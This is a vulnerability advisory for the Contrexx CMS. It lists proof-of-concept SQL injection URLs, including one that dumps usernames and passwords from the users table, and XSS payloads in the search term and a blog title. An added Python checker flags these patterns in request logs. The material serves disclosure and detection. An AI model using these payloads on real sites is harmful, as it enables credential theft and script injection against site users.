Contrexx Multiple Input Validation Vulnerabilities
An exploit is not required. The following proof of concept examples are available:

Supply the 'votingoption' parameter as value="1 /*!50030%20s*/" and submit the form.

/index.php?section=gallery&cmd=showCat&cid=41&pId=1%20/**/UNION/**/%20/**/SELECT/**/%201,1,CONCAT(username,'-',password),1,1,1%20/**/FROM%20contrexx_access_users

/index.php?section=search&term=%22%3E%3Cscr\ipt%3Ealert(%22xss%22)%3C/sc\ript%3E

Create a blog entry with the title <script>alert('xss')</script>
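For log review, a request check built around the parameters named above; this is an added example, not code from Contrexx or from the original entry. It assumes that 'cid', 'pId' and 'votingoption' are integer-only parameters, and the function names, the benign request and the form body are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumption: these parameters are only ever meant to carry plain integers.
NUMERIC_PARAMS = {"cid", "pId", "votingoption"}
# MySQL comment forms used in the samples: /**/ and versioned /*!50030 ... */
MYSQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
ANGLE_BRACKETS = re.compile(r"[<>]")

def check_query(query):
    """Return (parameter, reason) findings for a query string or form body."""
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]{1,10}", value):
            reason = "non-integer value"
            if MYSQL_COMMENT.search(value):
                reason += " containing MySQL comment syntax"
            findings.append((name, reason))
        elif name == "term" and ANGLE_BRACKETS.search(value):
            findings.append((name, "angle brackets in search term"))
    return findings

def check_target(target):
    """Check the query part of a request target such as /index.php?a=b."""
    return check_query(urlsplit(target).query)

# Request targets copied from the entry above, plus constructed samples.
GALLERY = (r"/index.php?section=gallery&cmd=showCat&cid=41&pId=1%20/**/UNION/**/"
           r"%20/**/SELECT/**/%201,1,CONCAT(username,'-',password),1,1,1"
           r"%20/**/FROM%20contrexx_access_users")
SEARCH = r"/index.php?section=search&term=%22%3E%3Cscr\ipt%3Ealert(%22xss%22)%3C/sc\ript%3E"
BENIGN = "/index.php?section=gallery&cmd=showCat&cid=41&pId=1"  # constructed
VOTE_BODY = "votingoption=1%20/*!50030%20s*/"  # constructed form body

if __name__ == "__main__":
    for label, result in [("gallery", check_target(GALLERY)),
                          ("search", check_target(SEARCH)),
                          ("benign", check_target(BENIGN)),
                          ("vote", check_query(VOTE_BODY))]:
        print(label, result)
```

The check decodes each value before testing it, so the percent-encoded and comment-padded forms are judged by what the application would receive. It does not cover the stored blog title, which has to be handled by output encoding where the title is rendered.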